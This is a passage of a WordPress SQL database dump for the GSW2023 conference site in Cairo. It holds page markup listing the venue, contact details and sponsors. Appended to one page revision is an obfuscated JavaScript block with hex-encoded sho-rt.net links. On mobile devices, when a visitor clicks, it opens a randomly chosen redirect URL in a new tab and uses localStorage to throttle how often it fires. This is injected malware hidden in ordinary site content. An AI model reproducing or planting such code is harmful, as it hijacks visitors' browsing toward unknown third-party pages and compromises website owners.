category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-16 00:05:35','2023-08-16 00:05:35','',3066,'https://gsw2023.com/?p=5235',0,'revision','',0);
INSERT INTO `dnctiavkr_posts` VALUES
(5236,1,'2023-08-16 00:06:50','2023-08-16 00:06:50','<p>[vc_row css=\".vc_custom_1692141164274{margin-top: -50px !important;}\"][vc_column][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #0000ff;\"><strong>Under the Auspices of </strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>H.E. Professor Mostafa Madbouly,</strong></span><br />\n<span style=\"font-size: 24pt; color: #0000ff;\"><strong>Prime Minister of the Arab Republic of Egypt</strong></span></h3>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_separator style=\"shadow\" border_width=\"10\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><strong><span style=\"font-size: 24pt;\">Prime Sponsors</span></strong></h4>\n<p>[/vc_column_text][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141338959{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141365647{margin-top: 35px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141399321{margin-top: 45px !important;}\"]<a href=\"https://www.mbrsc.ae/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5093 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/MBRSC-LOGO_1-01-300x149.png\" alt=\"\" width=\"300\" height=\"149\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/4\"][vc_column_text css=\".vc_custom_1692141414655{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a></p>\n<p>&nbsp;</p>\n<p style=\"text-align: left;\">[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner width=\"1/2\"][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/2\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a></p>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692144304348{margin-top: -50px !important;}\"][vc_row][vc_column][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1692141209167{margin-top: -70px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 